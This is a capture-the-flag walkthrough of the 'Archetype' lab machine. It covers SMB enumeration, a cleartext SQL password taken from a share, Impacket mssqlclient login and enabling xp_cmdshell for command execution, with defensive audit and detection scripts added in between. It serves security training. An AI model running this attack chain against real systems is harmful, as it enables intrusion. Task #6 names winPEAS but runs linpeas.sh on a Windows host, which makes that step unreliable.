Archetype
Task #1: Which TCP port is hosting a database server?
-
A: 1433
-
nmap -sC -sV 10.129.186.221
Nmap scan report for 10.129.186.221
Host is up (0.035s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-12-21T21:43:52
|_Not valid after:  2052-12-21T21:43:52
|_ssl-date: 2022-12-21T21:44:51+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m41s, median: 0s
| ms-sql-info:
|   10.129.186.221:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-12-21T13:44:44-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-12-21T21:44:42
|_  start_date: N/A
Task #2: What is the name of the non-Administrative share available over SMB?
-
A: backups
-
nmap -p 445 --script smb-enum-shares.nse 10.129.186.221
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.129.186.221\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.186.221\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.186.221\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.129.186.221\backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|_    Current user access: READ
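From the defender's side, the finding in this output is a disk share (backups) that an anonymous/guest session can read. The script below is an added example and not part of the original notes: it parses the smb-enum-shares block (the output above is embedded as its sample input, so it runs offline) and reports every share an anonymous session can reach, separating disk shares from IPC$. The function names are my own.

```python
from typing import Dict, List

# The smb-enum-shares output shown above, embedded so the check runs without a target.
SAMPLE_OUTPUT = r"""
| smb-enum-shares:
|   account_used: guest
|   \\10.129.186.221\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.186.221\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.129.186.221\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.129.186.221\backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: READ
|_    Current user access: READ
"""


def parse_smb_enum_shares(text: str) -> Dict[str, Dict[str, str]]:
    """Turn the smb-enum-shares block into {share_path: {field: value}}."""
    shares: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        # Drop nmap's "| " / "|_ " gutter and surrounding whitespace.
        line = raw.lstrip("|_").strip()
        if not line:
            continue
        if line.startswith("\\\\") and line.endswith(":"):
            # A line like "\\host\share:" opens a new share record.
            current = line[:-1]
            shares[current] = {}
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")
            shares[current][key.strip()] = value.strip()
    return shares


def anonymous_accessible(shares: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Every share whose 'Anonymous access' is anything other than <none>."""
    return {
        path: fields["Anonymous access"]
        for path, fields in shares.items()
        if fields.get("Anonymous access", "<none>") != "<none>"
    }


def anonymous_disk_shares(shares: Dict[str, Dict[str, str]]) -> List[str]:
    """Disk-tree shares an anonymous session can access. IPC$ is left out here
    because anonymous access there means null-session pipe access, not files."""
    return sorted(
        path
        for path, fields in shares.items()
        if fields.get("Type", "").startswith("STYPE_DISKTREE")
        and fields.get("Anonymous access", "<none>") != "<none>"
    )


if __name__ == "__main__":
    parsed = parse_smb_enum_shares(SAMPLE_OUTPUT)
    for path, access in anonymous_accessible(parsed).items():
        print(f"{path}: anonymous {access}")
    print("disk shares exposed to anonymous sessions:", anonymous_disk_shares(parsed))
```

Run against a saved nmap report, the two functions give a quick audit list: anything in anonymous_disk_shares is file content reachable without credentials and should be removed or restricted.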
Task #3: What is the password identified in the file on the SMB share?
-
A: M3g4c0rp123
-
smbclient //10.129.186.221/backups -U guest
to connect to the share
smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020

                5056511 blocks of size 4096. 2609339 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \> exit
-
cat prod.dtsConfig
to view the file
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
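The weak point here is a connection string with a cleartext Password= sitting in a file on an anonymously readable share. The following added example (mine, not from the write-up) is a small secret-scanning check a defender can run over SSIS .dtsConfig files before they are backed up: it parses the configuration XML, flags every ConfiguredValue whose connection string carries a Password/Pwd key, and writes out a redacted copy. The file contents shown above are embedded as the sample input; the function names are my own.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# The prod.dtsConfig shown above, embedded as sample input so the check runs offline.
PROD_DTSCONFIG = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Connection-string keys that carry a secret (compared case-insensitively).
SECRET_KEYS = {"password", "pwd"}


def parse_connection_string(value: str) -> Dict[str, str]:
    """Split 'Key=Value;Key=Value;' into a dict with lower-cased keys."""
    pairs: Dict[str, str] = {}
    for part in value.split(";"):
        if "=" in part:
            key, _, val = part.partition("=")
            pairs[key.strip().lower()] = val.strip()
    return pairs


def find_embedded_credentials(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (configuration path, user id, secret) for every ConfiguredValue
    whose connection string contains a password."""
    root = ET.fromstring(xml_text)
    findings = []
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        secret = next((pairs[k] for k in SECRET_KEYS if k in pairs), None)
        if secret is not None:
            findings.append((conf.get("Path", ""), pairs.get("user id", "?"), secret))
    return findings


def redact(xml_text: str) -> str:
    """Return the XML with every password value replaced by [REDACTED],
    leaving the rest of the connection string intact."""
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        parts = []
        for part in value_el.text.split(";"):
            key, sep, _ = part.partition("=")
            if sep and key.strip().lower() in SECRET_KEYS:
                parts.append(f"{key}=[REDACTED]")
            else:
                parts.append(part)
        value_el.text = ";".join(parts)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for path, user, secret in find_embedded_credentials(PROD_DTSCONFIG):
        print(f"cleartext password for {user} at {path}: {secret}")
    print(redact(PROD_DTSCONFIG))
```

The same scan can be pointed at a directory of exported package configurations; anything it reports should move into an SSIS parameter, a credential store, or Windows authentication rather than stay in a file that travels with backups.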
Task #4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
-
A: mssqlclient.py
-
wget https://github.com/fortra/impacket/releases/download/impacket_0_10_0/impacket-0.10.0.tar.gz
to download the impacket library
tar -xvf impacket-0.10.0.tar.gz
to extract the impacket library, then
rm impacket-0.10.0.tar.gz
to remove the
cd impacket-0.10.0
, then
python3 -m pip install .
to install the library and the example scripts
python3 examples/mssqlclient.py ARCHETYPE/sql_svc@10.129.186.221 -windows-auth
, then enter the password from above when prompted
Task #5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
-
A: xp_cmdshell
-
We need to enable xp_cmdshell first, then we can use it to spawn a shell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
to enable advanced options
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
to enable xp_cmdshell
xp_cmdshell dir c:\
to list the contents of the C drive
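Turning xp_cmdshell on leaves a trace: each sp_configure change writes a "Configuration option '...' changed from 0 to 1" message (error 15457) to the SQL Server ERRORLOG. The added example below (mine, not from the write-up) runs a detection over constructed ERRORLOG lines in that shape. It flags when xp_cmdshell is switched on and records whether the same session enabled 'show advanced options' shortly before, which is the two-step sequence shown above. It goes slightly beyond the page by also watching the Ole Automation Procedures option; the timestamps, spids and other log lines are made up for the example.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List

# Constructed ERRORLOG lines in the shape of SQL Server's configuration-change
# message; the timestamps, spids and the memory line are invented for this example.
SAMPLE_ERRORLOG = """\
2022-12-21 13:49:58.40 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-12-21 13:50:01.12 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-12-21 13:52:10.77 spid51      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2022-12-21 14:05:33.01 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that hand SQL Server an OS-level foothold; they should stay off
# unless there is a documented need.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}


@dataclass
class ConfigAlert:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int
    # True when the same spid enabled 'show advanced options' within the window first.
    chained_after_advanced_options: bool


def _parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")


def detect_dangerous_config_changes(log_text: str, window_seconds: int = 300) -> List[ConfigAlert]:
    """Alert on watched options being enabled (value going up, e.g. 0 -> 1);
    disabling them is not alerted."""
    alerts: List[ConfigAlert] = []
    advanced_enabled_at: Dict[str, datetime] = {}  # spid -> when advanced options went to 1
    for line in log_text.splitlines():
        m = CONFIG_CHANGE_RE.match(line)
        if not m:
            continue
        ts = _parse_ts(m["ts"])
        option, old, new = m["option"], int(m["old"]), int(m["new"])
        if option == "show advanced options" and new == 1:
            advanced_enabled_at[m["spid"]] = ts
            continue
        if option in WATCHED_OPTIONS and new > old:
            prior = advanced_enabled_at.get(m["spid"])
            chained = prior is not None and 0 <= (ts - prior).total_seconds() <= window_seconds
            alerts.append(ConfigAlert(m["ts"], m["spid"], option, old, new, chained))
    return alerts


if __name__ == "__main__":
    for alert in detect_dangerous_config_changes(SAMPLE_ERRORLOG):
        print(alert)
```

A change to xp_cmdshell that arrives from an application service account such as sql_svc, seconds after 'show advanced options' on the same session, is the pattern to page on; the 1 -> 0 line later in the sample is the cleanup step and is deliberately not alerted.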
Task #6: What script can be used in order to search possible paths to escalate privileges on Windows hosts?
-
A: winPEAS
-
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221218/linpeas.sh
to download the script
bash ./linpeas.sh
to run the script
Task #7: What file contains the administrator's password?
- A: ``
Task #8: Submit user flag
- A: ``
Task #9: Submit root flag
- A: ``